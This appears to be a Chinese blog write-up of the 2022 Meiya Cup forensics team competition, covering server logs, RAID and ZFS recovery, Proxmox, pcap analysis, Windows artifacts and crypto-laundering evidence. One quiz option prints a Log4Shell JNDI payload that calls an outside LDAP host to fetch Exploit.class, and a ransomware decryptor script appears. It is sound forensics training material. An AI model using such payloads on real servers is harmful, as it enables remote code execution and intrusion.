2022美亚杯团体赛 - XDforensics-Wiki
2022 美亚杯 团体赛AGC部分+资格赛服务器部分 所有服务器部分解题思路_2022美亚杯团体赛复盘-CSDN博客
目录
AGC
1
2 Media Sever挂载
3 ssh登入的看法 PTS
4
5 ssh日志
6
7 查看docker列表
8 查看docker运行
9 建立网站
具体分析
10
11
12 基本镜像存储池 查看内容 重新仿真
13 查看文件所有权
14
15 查看基本储存池快照
16 查看快照内容
21 流量分析 查看url
22 查看参数
23 查看后续内容
方式1
方式2 反汇编木马文件
24
25
26
27
28 分离流量包
29
31
32
33 网上邻居注册表
34
35
36
37
38
39
40
41
42
43
44
raid重组
方法1 虚拟机自动重组
方法2 USF、R-Studio自动识别重组
45 LVM中 CG `pve` 存在多少PE
46 Proxmox用户
47 进入Proxmox web服务 导出虚拟机
48 ubuntu nginx重建网站 查看日志 分析木马
重构网站
49 查看设备登入失败个数 btmp查看
50
51
52 重建邮电系统
53
54
55
56
朗尼
89 查看hostname
90 查看network文件
91 openvpn的配置
92
93
94
95 损失文件在扇区中的查找
106
107
108
109 回复种子--->比特币关键词
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
126
127
128
129
130
王景浩
17
18
19 通过加密算法进行解密
20
57 MAC取证
58
59
60
61
62
63 解密MA密码
64
65 通过 manifest.plist 查看版本
66
67 查看备份密码
68
69 hashcat 爆破itunes backup的参数
70 passware爆破密码
71 查看3D打印内容
72
73 3D打印的文档问题
74
75
76
77 查看 messageid
78
79
80 查看openvpn 获取ip地址
81 配置蓝牙访问mac地址
82
83 挂载备份文件
84
85
86 大疆飞行日志分析
87
88
96 计算存储容量
97
98 查看磁盘标识符
99
100 修复sd卡
101
102
103
104
105
团队赛密钥
av?5CAXw;&N`X)6)%B>Y<`Gx[IVq<5F;mAQp]b@ftYpF6v,*88~%wF*CS}.w*7"S(,I[gJE((9cwT@zEh2mY$AK[aZzW&JFR<\FE}RC\Gjx[!ec^GrDne]xK)SuUPMWX
AGC
1
[填空题] 在朗尼手机于2022年9月30日的 ‘WhatsApp’ 对话里,有一段音讯 (Voice Message) 提到王景浩会给朗尼现金多少作为租用 ‘VPN’ 的租金? (以阿拉伯数字回答) (3分)需要去查看朗尼的手机 所以我们去取证手机
导出音频倒放即可
在线Mp3反向器 - 倒放音频文件
3000
2 Media Sever挂载
[填空题] 就AGC集团网络的流媒体服务器 (Media Server),有多少个本地用户曾经成功登录过? (以阿拉伯数字回答) (1分)取证去取media server 内容
解压后挂在MediaServer\e01\sda\sda.E01内容 然后就可以挂在成功了
这里问本地用户成功登入
只有3个成功登入过
3 ssh登入的看法 PTS
就AGC集团网络的流媒体服务器, 有多少个本地用户曾经成功用 ssh 登录过?
这里只要是pts 就是通过ssh登入的
所以这里的用户只有3个
4
就上述的本地用户, 成功通过 ssh 登录过该流媒体服务器多少次?
12次
5 ssh日志
试找找记录失败的登录尝试信息. 有以下哪一个名称曾尝试用 ssh:notty 登录该流媒体服务器?
A:iamhacker B:hacking C:hack D:hacker E:以上皆非这里需要我们查看ssh登入记录 那么就是在 vat/log/auth.log中
但是其实在镜像中log日志都没了
所以我们去看backup压缩包
发现是 C
6
就该流媒体服务器的本地用户, 有一个用户名是 S 开头的, 试找找该用户的姓氏?这里确实离谱 主要是我们先确定S开头的用户
然后我们需要去数据库中查?为啥知道在数据库。。。可能敏感信息存在数据库里吧
然后我们仿真去看看
感觉应该是这个
直接弘连数据库分析就行了好像
Li
7 查看docker列表
该流媒体服务器是有使用 Docker 容器的,当中包含以下哪个 Docker 镜像?
A. apache2
B. ubuntu
C. centos
D. nginx
E. hello-world
F. 以上皆非
或者直接去仿真查看
docker images
BCDE
8 查看docker运行
就上述的 Docker 镜像, 哪一个镜像在系统上运行中?
A:apache2 B:ubuntu C:centos D:nginx E:hello-world F:以上皆非docker ps
就 nginx D
9 建立网站
该流媒体服务器是使用 WordPress 建站的, 就比特币 标题, 有以下的电子邮箱地址曾经留有评论?¶
A:cn.wordpress.org B:root58462@mail.qq.com C:hi456@163.com D:root@163.com E:user1@localhost.net F:以上皆非
这里要重新启动网站
首先我们查看一下服务
systemctl status apache2
systemctl status mysqld可以发现都是启动的
然后我们查看本地ip
然后去火狐查看
然后我们直接输入目录
wordpress即可访问了
具体分析
这里我们是可以直接访问的
但是为什么访问wordpress呢
我们首先来看看
首先查看apache的配置
cd /etc/apache2
ls
cat apache2.config
这里我们发现include了内容
然后我们去site中查看
发现了网站目录
然后我们就可以去查看一下了
所以这里我们访问一下wordpress
这里可以直接访问 但是我们点比特币的时候 就没有响应 因为他把ip写死在源代码里了
这里有一个方法 就是通过bp来替换
然后进行抓包放包
进来咯这里有两个 肯定藏在数据库里 所以我们去访问看看
sudo su 进入root
mysql -u root
show databases;
use wordpress;
show tables;
这里我们想通过用户名获取邮箱账号 所以我们查看用户信息即可
第二种我们可以去通过网站配置sql信息查看
最终成功获取邮箱
10
10. [单选题]该流媒体服务器里其中一个本地用户是有使用 'calendar' 日历工具的, 日历内曾经提及以下哪个网站? (3分)
A. https://weibo.com
B. http://www.baidu.com
C. https://www.douyin.com
D. https://youku.com
E. https://www.binance.com
F. 以上皆非
E
11
11. [单选题]该流媒体服务器里是有使用磁盘阵列 (RAID) 的, 该设备是使用哪一个 RAID 级别? (请选择最合适的答案) (1分)
A. RAID 0
B. RAIDz2
C. RAIDz3
D. RAID 10
E. RAID 5
F. 以上皆非这里貌似我们不需要取证
这里我们可以看到是mirror
F
12 基本镜像存储池 查看内容 重新仿真
该基本镜像存储池里储存了一些视频档案, 请找出一段儿童色情影片, 该档案的最后修改时间是什么月份?这里我出现了问题 因为当时仿真只选择了 sda的E01
所以数据不全
这里我们应该需要通过 abcd的E01恢复数据
开始仿真
这个时候 mediao就有东西了
找到咯
这里其实还有地方没确定
我们怎么知道 基本镜像存储池是什么呢
ZFS/ZPool - Ubuntu Wiki
所以我们使用 zpool status命令可以查看
这里确定是在media0 这里
13 查看文件所有权
[填空题] 承上题,拥有该段儿童色情影片的用户名称是什么? (不要输入符号,以大写英文及阿拉伯数字回答) (1分) root
ls -l
发现是 root
14
[填空题]就AGC集团网络的流媒体服务器,曾经有用户搜索过有关于儿童sq影片的资料而得到搜索结果,该用户所输入的网址是什么? (不要输入符号,以大写英文及阿拉伯数字回答,如 https://web3.com,需回答 HTTPSWEB3COM) (2分)这里结合上面的内容 既然是root那么我们首先在浏览器中没有发现结果 linux只可能是命令了
我们去看root的命令
发现存在 所以我们去搜索一下link.html这个内容是什么
需要切换
发现是url编码了 我们去看看内容
哦吼 找到了
这里我觉得是通过
curl -i -o link.html https://bit.ly/3xyi8b5这个命令去获取了 sq影片 所以我觉得答案是
百度安全验证但是 这里我们可以发现 这个页面就是百度搜索
所以最后是百度
15 查看基本储存池快照
[填空题]该基本镜像存储池 (pool) 有一个快照 (Snapshot),快照的名称是什么? (不要输入符号,以大写英文及阿拉伯数字回答,如 media/mediapool@abc123,需回答MEDIAMEDIAPOOLABC123) (1分)这里就要去搜了
搜一下就可以发现 我们可以通过 zpool history 查看历史命令
我们去看看
这不就出来了
media0/mediastorage@version1看了wp 原来有更简单的
zfs list -t snapshot确实更直接
16 查看快照内容
[填空题]就上述所找到的基本镜像存储池快照 (Snapshot),它储存了多少个档案? (以阿拉伯数字回答) (1分)这里我们需要知道存储了多少 那么查看快照 我们只有回档了 我们查一下命令
media0/mediastorage@version1然后我们去查看
24个
21 流量分析 查看url
[单选题]分析IP地址61.238.217.108向AGC服务器10.0.66.184发送的第一个 'GET' 指令,它请求的统一资源定位系统 (Uniform Resource Locator - URL) 是什么? (1分)
A. http://155.137.195.111:8080
B. http://www.w3.org/2003/05/soap-envelope
C. http://61.238.217.108:8000
D. 以上皆非这里都已经开始分析ip和服务器还有get
要么日志 要么流量分析
这里正好存在检材 所以我们就去看看
155.137.195.111:8080
因为是http的读取
所以我们首先过滤http
然后进行追踪流 查看第一个就是了
22 查看参数
[单选题]IP地址61.238.217.108曾经向AGC服务器10.0.66.184发送 'POST' 指令,它在 'HTML Form' 项目的 'uname' 栏所输入的字符串是什么? (1分)
A. root
B. ${jndi:ldap://61.238.217.108:1389/a}
C. application/x-www-form-urlencoded
D. password简单 找到post
选B
23 查看后续内容
23. [单选题]AGC服务器10.0.66.184收到IP地址61.238.217.108的 'POST' 指令后,它执行了哪些行动? (2分)
A. 使用端口46858连接IP地址61.238.217.108的LDAP服务器的指定端口
B. 于IP地址61.238.217.108下载了Exploit.class
C. 使用端口49264连接IP地址61.238.217.108发送同步要求
D. 以上皆是方式1
这里看看tcp追踪流
发现在上一个流后面是跟着这个流
然后就是命令执行了
这里我们就发现了是通过 49264端口进行执行
还有一种方式
方式2 反汇编木马文件
class通过jd 反汇编
但是不知道为什么出现了 {
答案就是D
24
[填空题]在上述行动后,IP地址61.238.217.108利用哪个端口 (Port) 向AGC服务器10.0.66.184发出指令? (以阿拉伯数字回答) (1分)这里我们知道了 是通过 9001 端口向服务器发起攻击
25
[多选题]AGC服务器10.0.66.184里有一个AGC目录 (Directory),它的子目录 (Sub Directory) 包含以下哪一个? (2分)
A. Accounting
B. Picture
C. Staff
D. Sambashare
E. Retail这里都问目录了 应该是命令执行了 所以我们看一下
ACE
26
[多选题]入侵者迸入AGC服务器10.0.66.184后,他成功执行以下哪些指令? (2分)
A. 檢视了readme.txt内容
B. 删除了三个档案
C. 删除了一个目录 (Directory)
D. 替档案改名
E. 建立了两个txt档案这里读一下代码就行了
删除了两个文档
E,D对的对的
27
\27. [单选题] 入侵者曾经传送一个档案到AGC服务器10.0.66.184并将它改名 (Rename),这个档案的原来名称是什么? (1分) A
A. cGhvdG9zT0Zyb2NreQ==
B. Finanical.xls
C. readme.txt
D. anonymous
A
28 分离流量包
28. [单选题]承上题,该档案原档的建立日期是什么? (2分)
A. 2022-10-21 08:10:30 (UTC+0)
B. 2022-10-21 16:19:39 (UTC+0)
C. 2022-10-22 08:10:30 (UTC+0)
D. 2022-10-22 14:22:06 (UTC+0)
E. 2022-10-22 16:19:39(UTC+0)
这里问时间咯 我们注意一下 去看一下时区
timedatectl发现是上海的 所以-8 这里就是 6. 但是没有 那么就无所谓了 直接选 14
D
然后这里还看到一个做法。。。。 确实都没想到我靠。。。
我们可以直接通过 分离流量包获取pdf
foremost AGC_Server_2.pcap就可以发现分离出来了pdf和html
可以来尝试一下
29
29. [单选题]承上题,该档案的SHA-256哈希值是什么? (3分)
A. a6eef1... ...27364c
B. 54785c… ...fe86f0
C. 961f2b… ...647d55
D. a00e6c… ...d0eaab
E. 以上皆非这里好像就要pdf 所以上面我们确实需要提取出来
这里直接算一下就行了
1D53F0FC6E23BFDED5C72C17AB52F4D090FB3175190D921E2DEE2E452D0760A8E
31
31.[单选题] 分析AGC-CS计算机 (Computer) 里最初的作業系統 (Windows) ,它的实際安装时间是什么? (以时区UTC+8回答) (3分)
A. 2022-09-26 14:35:17
B. 2022-09-26 21:35:17
C. 2022-09-27 05:35:17
D. 2022-10-05 03:52:15
E. 2022-10-05 11:52:15开始分析计算机 我们取证获取看看
这里直接就说UTC-8
所以我们去看我们的时区 发现就是北京 那就没事了 直接开冲
2022-10-05 03:52:15 +0800 CST火眼取出来不是一样的
名称:安装时间
值:2022-09-27 05:35:17
系统:Windows 10 Pro<1>
删除状态:正常
不知道为啥差这么多 选C
32
[单选题]AGC-CS计算机里的 'Acrobat DC' 软件的安装时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (1分)
有两个 选第一个吧
33 网上邻居注册表
[单选题]AGC-CS计算机里的用户 'Carson' 链接了一个网络磁盘机 (Network Drive),在下列哪一个档案有相关资料? (2分)
A. \Users\Carson\NTUSER.DAT
B. \Users\admin\NTUSER.DAT
C. \Windows\System32\config\SYSTEM
D. \Windows\System32\config\SOFTWARE
E. \Windows\System32\config\SECURITY这里我们首先要知道这个是啥 就是一个网络共享好像
我们可以收到 是通过 \\ip的方式访问 我们去索引看看
然后我们跳转源文件 就可以看到是从哪里解析出来的了
A
34
[单选题]承上题,用户 'Carson' 连接的网络磁盘机的IP地址是什么? (1分)
A. \\192.168.182.134\
B. \\192.168.182.134\photo
C. \\192.168.182.134\share
D. \\192.168.182.134\AGC
E. \\192.168.182.134\AGC photoC
35
[填空题]分析计算机里的电邮数据,当中包含嫌疑人王景浩可能的居住地址,请回答他住址的楼层 (以阿拉伯数字回答) (1分)这里我们需要找到家庭住址 有点恼火了
然后就去看 发现了 邮箱里存在着
香港灣仔港灣道28號灣景中心A座45樓C室
36
[填空题]承上题,王景浩使用的信用卡号码最后四位数字是? (1分)这里我们看到了 6171
37
[填空题]AGC-CS计算机用户 'Carson' 曾经收到一个电邮并通过里面的链结下载了一个可疑的 'Word' 文件,那个档案的档案名是什么? (不要输入 '.',以大写英文及阿拉伯数字回答。如 Cat10.jpg,需回答CAT10JPG) (1分)这里其实和邮箱没有关系 主要是从邮件里下载了 东西 所以我们前往下载目录看看
只看到了 一个docx 所以就是这个咯 KEFMUONDOCX
38
38. [单选题]承上题,分析该 'Word' 文件,它的可能用途是? (3分)
A. 访问一个网站
B. 记录键盘操作
C. 把档案加密
D. 改变桌面壁纸
E. 关闭计算机
A
39
[单选题]AGC-CS计算机里有一个名为 'admin' 的用户,它是在何时被建立的? (以时区UTC+8回答) (1分)
A. 2022-09-28
B. 2022-09-29
C. 2022-09-30
D. 2022-10-01
E. 以上皆非
看到了上次密码设置时间B
40
[填空题] 黑客第一次采用用户 ‘admin’ 通过远程桌面协议 (Remote Desktop Protocol - RDP) 登录了AGC-CS计算机的时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (2分)
这里看到了 连接时间是这个 20220929204142
41
[填空题] 黑客入侵AGC-CS计算机后下载了一个扫描端口 (Port Scanning) 的软件,这软件的真正名称是? (以大写英文及阿拉伯数字回答) (3分)我感觉没有依据
但是这里说是下载的东西
这里我们还是需要通过微步来实现 首先我们能发现一个非常异常的东西 为什么在 download中 会存在一个svchost.exe文件 我们直接丢到微步中看看
42
[填空题]承上题,黑客采用上述软件取得一些计算机的IP地址及媒体访问控制地址 ('Media Access Control' Address - MAC Address) 并存到一个名为 'ip.txt' 的档案。当中 '192.168.182.130' 计算机的MAC地址是什么? (不要输入 ':' 或 '-' ,以大写英文及阿拉伯数字回答) (3分)需要去王昊的电脑查看
43
[填空题]AGC-CS计算机里的一个跳转列表 (Jumplist) 显示了用户 'admin' 曾经采用记事本 (Notepad) 打开了一个文字档案,这个文字档的SHA-256哈希值是什么? (以大写英文及阿拉伯数字回答) (3分)44
[单选题]黑客除了通过 'RDP' 外,还采用什么软件远端控制 (Remote Control) AGC-CS计算机? (1分)我们去看看还有没有什么远控的东西
发现又下来一个 这个就是远控
raid重组
这里我们看到这个server就是知道是需要通过raid重组实现
所以我们开始进行
方法1 虚拟机自动重组
首先打开火眼仿真
然后通过火眼仿真将三块都放进去 并且放入一个注册的vmdk 虚拟机
然后直接进行开始创建
然后我们首先会在选择界面
我们先进入第一个 然后他就会开始自动恢复数据
然后就会进入一个内核shell 里面啥东西都没有
所以我们直接关闭虚拟机 直接重启
然后再打开虚拟机
进入rescue选项
然后我们就修复完成了
然后他就会自动重启 我们继续选择 rescue选项
他就可以进入系统了
下面就是进行挂载
然后通过mount 进行挂载 可以发现 swap挂载不上 但是无所谓 我们需要的数据就是root和data 这样就可以实现了
但是这个方法我们无法丢进取证的地方进行识别我们下面介绍其他的
方法2 USF、R-Studio自动识别重组
这里先 直接丢进入
首先看看USF
我们能发现 将三个镜像丢进USF中后 就会直接识别出来agc0 里面包含了我们所需要的
data root swap
所以我们直接导出即可
选择目录进行导出即可 但是我没内存了 导不出了
下面是R-Studio
我们丢进去看看 我们首先要去FTK 进行挂载
不然就会这样
识别不出 所以我们现在去挂载一下
FILE ----> Image Mounting 进行挂载
每一个都按照这个设置进行挂载 然后我们回到 R-Studio
这个时候我们发现 已经实现了重组
然后我们就可以导出镜像了
但是还是要等很久的
1个小时!!!!!要死了
我们开始做题吧
ok取错了 这里设置设置成压缩的了 所以取出来 取证不了 。。。。
我们重新取证 这里需要选择 byte这个
45 LVM中 CG `pve` 存在多少PE
45.[填空题] AGC_Server里LVM (Logical Volume Management 逻辑卷轴管理) 的 VG (Volume Group 卷组) ‘pve’ 共有多少PE (Physical Extent 物理块) ? (以阿拉伯数字回答) (1分)捏吗 这都啥和啥 啊 我们先去了解一下这些是什么东西
LINUX - LVM原理及PV、VG、LV、PE、LE关系图_pg、vg、lv关系图-CSDN博客
我觉得这个图最清楚了
其实我们直接去搜就可以获取命令了
vgdisplay
这里我们能发现 是114147 但是我看了其他师傅的wp
有答案不一样 这里记录一下
一样通过R-Studio打开 然后我们可以在重组后的十六进制文件里找到 PVE字样 然后打开看看
46 Proxmox用户
AGC_Server 里的 Proxmox 虚拟化环境有哪一个用户?
A:root
B:VM_admin
C:sysadmin
D:acl
E:tss
这里我们先要知道 Proxmox是什么东西
然后发现这里不就是 系统吗 所以是linux系统 我们可以那么肯定存在root用户了
但是我们最好还是去看一下 linux中查看用户信息 要么就 /etc/passwd 要么就/etc/shadow
发现存在AE
但是还有一种说法 并且答案和上面不一样 但我觉得下面这个方法是正确的
是可以通过 Proxmox的网站进行访问
但是这里需要的是通过 R-Studio取出来然后仿真的镜像, 第一种貌似无法实现
我们首先将取出来的内容进行取证 然后通过火眼仿真 查看内容
结果发现 火眼无法识别 那么我们选择美亚的吧
美亚取证大师能够识别 所以我们直接通过美亚取证仿真
开始仿真 下面的题目貌似无法直接从取证中获取 所以我们需要通过仿真来实现
这个时候我们就成功进入了 系统
然后我们需要访问Proxmox的web服务 所以我们先需要修改网络
cat /etc/network/interfaces
我们能发现这里使用的是 eno1
我们修改为我们的 ens33 这里推荐直接通过 xshll ftp实现
然后通过 dhclient 我们就可以获取到我们的虚拟机设置的ip了
然后我们去看看能不能访问web服务
这里需要注意 需要加上 https://ip:8006才可以访问 必须要https
这样就访问上去了 然后我们可以开始摸索了 首先这道题就是问我们 用户 我们去看看Users
发现了只存在 root 和 sysadmin 所以我觉得是AC
47 进入Proxmox web服务 导出虚拟机
检视 Proxmox 里的 VM, 编号 111 的主机名是什么?这里我们就可以去上面发现了
这里问111的主机名 我们可以去访问一下111的主机
我们点击远程命令执行的时候 下面开始报错了 但是这里我们可以知道了 他的磁盘 是三个这个
这个文件 然后我们去摸索 data磁盘 里面的111 我们导出取证 这里我们发现 他们的大小不一样
raid 不会大小不一样 因为需要均匀分配校验码 所以这里不会再来是raid重组 所以这里我们直接取证,我们认为他是一个系统盘 其他是存储盘
直接取证
这里丢进火眼之后 会发现动态 让我们选择 所以我们选择后他就可以输出linux系统
这里有个坑 我们从取证大师中导出是错误 的 无法进行挂载 我后面是通过 FTP 进行下载 实现挂载
需要有这么多完整的数据才是正确的
这里我们添加 1 的检材
然后添加动态的时候 只需要添加 2 3 即可 4G的不需要
这里火眼又取证失败了
我们直接去美亚仿真吧
然后我们仿真
然后我们查看主机名 hostname命令
48 ubuntu nginx重建网站 查看日志 分析木马
分析 VM 编号 111 的网页服务器日志, 当中记录了黑客曾向该服务器发出多少次网络攻击?(存疑)这里我们既然要看服务器这些 肯定就是要先网站重组(其实不需要) 但是还是看看重组吧
放弃火眼取证了 用美亚吧 火眼直接啥都取不出来
我们首先看看用户执行了什么
我们阅读可以发现 这里主要执行命令是两个用户 一个是root 一个就是 systemadmin
所以我们首先看看sysadmin做了什么
能够发现 是对服务器 和 网站进行配置 那我们看看能不能重构网站
重构网站
首先查看服务是不是开启了 首先就是服务器
MYSQL
NGINX
这里服务全部是开启状态 我们现在去看看具体信息
ssh链接需要修改root登入权限 大家记得去百度一下
SSH 登录 Ubuntu 出现错误,拒绝密码:Permission denied,please try again._ubuntu ssh 密码不正确-CSDN博客
我们继续 去查看sysadmin修改过的数据
首先我们查看服务器配置
发现include了 conf.d
我们去看看里面的配置
发现了 这里的目录和网站名称
然后我们将host加入本机
可以去火眼的host编辑器
然后访问
http://www.agcom.shop/
这里网站就重建成功
我们现在需要看 日志 就是被打了多少次
在分析网站的时候
出现了日志存放地址 我们去看看
这里我们首先通过前面 知道是通过一个java文件 然后执行命令的
所以我们注意一下这里 然后我们去看看网站是否被上马了
发现有一个exp这个文件 打开后
我们发现 这里为啥执行了计算器 这里正常网站一个是不需要的 所以我觉得这里有问题
直接上传微步看看
发现是木马了
所以这里就是漏洞程序 所以我们需要注意 exp这个html
我们去搜一下
所以是24个
49 查看设备登入失败个数 btmp查看
[单选题]哪一个IP地址尝试登录'VM' (虚拟机) 编号 '111' 失败次数最多? (1分)
A:38.242.130.207
B:218.92.0.206
C:43.142.93.22
D:121.202.141.105
E:61.238.217.108
这里给了选项 我们可以执行命令 查看一下个数
所以我们去看btmp 通过命令
啥都没有 看第二个
看到只有 61 出现了两次 所以是 E
50
[填空题]黑客在入侵 'VM' 编号 '111' 后,打算涂改AGC公司的网页,黑客在传送相关档案时所用的端口 (Port) 是什么? (以阿拉伯数字回答)这里我们看到 是用来涂改AGC公司的网页
那么我们就去网站下面看看有没有其他的
找到这个了 但是这里没有找到下载这个的地方 所以先跳过
51
[多选题]根据 'VM' 编号 '111' 里的网页服务器 (Web Server) 的设定,访客可从下列哪个网页地址访问这个服务器? (2分)
A. localhost
B. www.ag.com.shop
C. www.agcom.shop
D. agcom.shop
E. www.agcom.com这个我们已经找到了 C D
52 重建邮电系统
[填空题]黑客曾入侵 'VM' 编号 '111' 里的电邮系统 'Xeams',他登录的时间是? (以unix时间戳回答,格式如:1665049779010) (2分)这里我们就要开始重建 Xeams
我们先去找一个操作手册 然后访问一下 5272端口就出来了
这里需要账号密码 还是要去看一下
怎么获取 这里搭建了邮箱 当时在电脑上也获取到了邮箱 我们去看看能不能通过windwos解析出
账号密码
拿到咯 登进去看看
然后去看看文件日志
然后我们可以看到
转换为时间戳即可
但是是错误的 我们应该查找182.239.119.134 理由看下一题
53
黑客在入侵后盗用 AGC 员工电邮户口及冒充 AGC 员工回复了电邮给客户, 发出这封电邮的操作系统及电邮软件是什么?
A. Mac OS X 10.15 rv:102.0 Thunderbird/102.3.0
B. Mac OS X 10.15 rv:102.0 Thunderbird/91.13.1
C. Mac OS X 10.11 rv:91.0 Thunderbird/91.13.1
D. Mac OS X 10.11 rv:60.0 Thunderbird/60.9.1
E. Windows 10 Pro Outlook 2016
这里存在银行 如果黑客进行写邮件 要么就是恶搞 要么就是骗钱 这里写出了银行卡
所以应该是这个邮件 然后我们去看这个日期的日志
但是这里注意 既然这里记录了ip 所以上一道题是错误的 因为这一道题的ip 对应了repost
里面的 段
选D
54
黑客在 Proxmox 里留下了一个被加密的程序, 在解密后它的 SHA-256 哈希值是什么?
需要解密 我们导出先
我们去日志执行python的地方看看(systemadmin历史命令)
发现到咯 这个东西 勒索
我们来执行一遍
这里 居然是对py进行计算。。。。 我还以为要干嘛呢
55
55 承上题, 分析程序代码, 上述程序的档案名应是什么?上题的python名
56
于虚拟机 VM 编号 111 里的档案 \srv\samba\share\AGC photo\DSC01139.JPG , 照片中出现的街道名称是
A. 河背街
B. 沙咀道
C. 众安街
D. 香车街
E. 川龙街这里我们先去看看这是啥咯
发现加密了
所以我们使用脚本里面的解密方式
import os
from cryptography.fernet import Fernet
files_allfiles2 = []
path2 = os.getcwd()
for root, dirs, files in os.walk(path2):
if "RANSOM_NOTE.txt" in files:
files.remove("RANSOM_NOTE.txt")
if "ransomware-ver-finalv2.1.py" in files:
files.remove("ransomware-ver-finalv2.1.py")
if "decrypt-ver-final.py" in files:
files.remove("decrypt-ver-final.py")
for file in files:
filepath = root + "/" + file
files_allfiles2.append(filepath)
print(files_allfiles2)
with open("/tmp/thekey.key", "rb") as keyread:
secretkey = keyread.read()
for file2 in files_allfiles2:
with open(file2, "rb") as unlockfile:
contents2 = unlockfile.read()
decryptedContents = Fernet(secretkey).decrypt(contents2)
with open(file2, "wb") as unlockfile:
unlockfile.write(decryptedContents)
解密
C
朗尼
89 查看hostname
89. [单选题]朗尼草莓 (Raspberry) 计算机操作系统的主机名称 (hostname) 是什么? (1分)
A. OpenWrt
B. admin
C. root
D. AsusRt
E. DDwrt这里需要朗尼电脑 我们就可以通过取证
来看到hostname
拿到这个我也很蒙蔽 咋就90M
取证一下把文件识别出来一下
然后我们要去看hostname /upper/etc/config/system
A
90 查看network文件
90. [多选题]以下哪项对于朗尼草莓计算机操作系统的描述是正确的? (2分)
A. LAN地址是 192.168.1.24
B. 提供点对点隧道协议 (Point-to-Point Tunneling Protocol - PPTP) VPN服务
C. WIFI登录密码为'OpenWrt'
D. 提供网络时间协议 (NTP) 服务
E. 时区设置相等于UTC+8这里我们首先要通过这些内容进行查看
通过查看我们可以发现存在openvpn 所以B应该也是对的
wifi去哪里看呢
还是在这个目录下的 wireless查看
key就是密码 所以是错误的
C
下面这两个可以通过 system查看
然后 这里ntp没有开启
所以答案是CD
91 openvpn的配置
91. [多选题]承上题,'VPN' 服务器的IP地址及端口 (Port) 是什么? (2分)
A. IP地址 61.238.217.108
B. IP地址 192.168.8.1
C. IP地址 103.10.12.106
D. 端口 33248
E. 端口 1194
F. 端口 1701我们去翻翻看openvpn的内容
AE
92
[填空题]朗尼草莓计算机操作系统设定了一个档案来储存系统的 'log_file' ,档案名称是什么? (不要输入 '.',以大写英文及阿拉伯数字回答。如 Cat10.jpg,需回答CAT10JPG) (2分)直接去搜
可以发现是SYSlog
93
93. [单选题]承上题,检视上述的档案,当中有几个IP地址曾经成功登录这个系统的 'VPN' 服务? (3分)
A. 1
B. 2
C. 3
D. 4
E. 0我们去看SYSlog日志 可以发现 登入成功存在
Password auth succeeded所以我们可以进行过滤 而且日志不多可以直接看出来是B
94
94. [单选题]承上题,检视上述的档案,当中有几个IP地址曾经尝试以 'root' 登入装置但因密码错误而不成功? (2分)
A. 2
B. 4
C. 5
D. 6
E. 8会出现
Bad password attempt for 'root'
所以过滤一下有5个
D
95 损失文件在扇区中的查找
95. [填空题]根据装置的过往记录,'log_file' 是设在 'usr/rooney/' 的哪个已被删除的子文件夹里 (Sub Directory)? (以大写英文回答) (3分)这里已经是损失的文件了 所以我们去扇区中进行查找
这里的文件夹就是 RECORD
106
106. [单选题]朗尼的计算机有什么软件可以创建比特币钱包 (Bitcoin Wallet)? (1分)
A. MetaMask
B. Electrum
C. Trezor
D. 以上皆非这里问计算机了 所以我们去取证计算机 有点大 的
然后我们去查看下载 发现用户下载了这个
107
107. [填空题]朗尼通过比特币替王景浩清洗黑钱,分析朗尼的计算机及手机,朗尼收取王景浩黑钱的比特币地址 (Bitcoin Address) 是什么? (以大写英文及阿拉伯数字回答) (1分)这里看到收取黑钱,那么肯定是有交流 我们先去看看他们交流的地方
我们去取证手机
108
108. [单选题]朗尼收取王景浩多少比特币作为清洗黑钱的费用? (1分)10%
109 回复种子--->比特币关键词
109. [单选题]朗尼的计算机里有一个没被加密的比特币钱包,它的回复种子 (Recovery Seed) 不包含哪一个英文字? (1分)
A. oppose
B. area
C. twice
D. roast
选D
110
110. [单选题]朗尼的计算机里有多少个加密了 (Encrypted) 的比特币钱包? (1分)
A. 1
B. 2
C. 3
D. 4
E. 5除了 rc其他都被加密了
E
111
111. [单选题]朗尼将加密了的比特币钱包的密码存在他计算机的一个档案里,这个档案的副档名是什么? (以大写英文及阿拉伯数字回答) (3分)
A. DMG
B. PDF
C. ASD
D. ZIP
E. PNG
这里就asd可以看到有奇怪的 我们看看
看到了账号密码
C
112
112.[单选题] 朗尼在手机里有一个加密了的比特币钱包,他采用什么应用程序把该钱包里的黑钱转换成另一种加密货币? (2分)
A. Safepal
B. Metamask
C. Changelly
D. Opensea这里其实我们知道了 是通过NFT 卖出 然后洗钱 所以这里选D
还有一个去翻手机相册
113
113. [单选题]承上题,这次转换加密货币的日期和时间是什么? (以时区UTC+8回答) (2分)
A. 2022-10-07 10:29时
B. 2022-10-07 11:06时
C. 2022-10-07 11:07时
D. 2022-10-07 13:54时我们继续看相册
A
114
114. [单选题]朗尼在计算机里采用什么浏览器 (Browser) 及在什么日期时间在他的计算机安装 'MetaMask' ? (以时区UTC+8回答) (1分)
A. Chrome 2022-08-25 12:35时
B. Chrome 2022-10-07 14:29时
C. Firefox 2022-08-25 12:35时
D. Firefox 2022-10-07 14:29时我们看看默认浏览器
发现是chrome 然后我们去看看 metamask
根据url信息 然后通过查询 路径可以发现存在
时间是 10-6 选B
115
115. [单选题]朗尼在计算机里所创建的非同质化通证 (Non-Fungible Token - NFT) 使用哪一个种区块链 (Blockchain) 技术? (1分)
A. Ethereum
B. Polygon
C. Solana
D. Arbitrum
E. Klaytn这里电脑其实是找不到的
A
116
116.[单选题] 朗尼在什么日期时间把计算机中创建的非同质化通证 (NFT) 放售? (以时区UTC+8回答) (2分)
A. 2022-10-07 14:47时
B. 2022-10-07 14:49时
C. 2022-10-07 14:52时
D. 2022-10-07 14:54时首先可以搜索opensea 因为我们在前一题搜索NTF的时候有看到 所以我们就可以看看opensea
这里我们可以看到是good luck的这个 然后我们看看具体时间 但是看wp是说是 A
是 create的那个
117
117. [多选题]朗尼的手机里,有什么应用程序与将黑钱 (比特币) 转换成另一加密货币的地址有关? (2分)
A. Metamask
B. Opensea
C. Safepal
D. YouTube然后这里发现了 是 B 但是其他也都可以收到 所以我觉得是 ABC
118
118. [单选题]朗尼的手机里,于2022-10-07,15:07时至15:08时做过什么动作? (以时区UTC+8回答) (2分)
A. 登录 'Metamask'
B. 登录 'Opensea'
C. 屏幕截图 (Screen Capture)
D. 登录 'YouTube' 
先去看看最简单的 屏幕截图 只有10个 看完就出答案了 C
119
119. [多选题]承上题,从这个动作中能找到什么资讯? (1分)
A. Opensea.io
B. Ethereum Main Network
C. Your purchase is complete
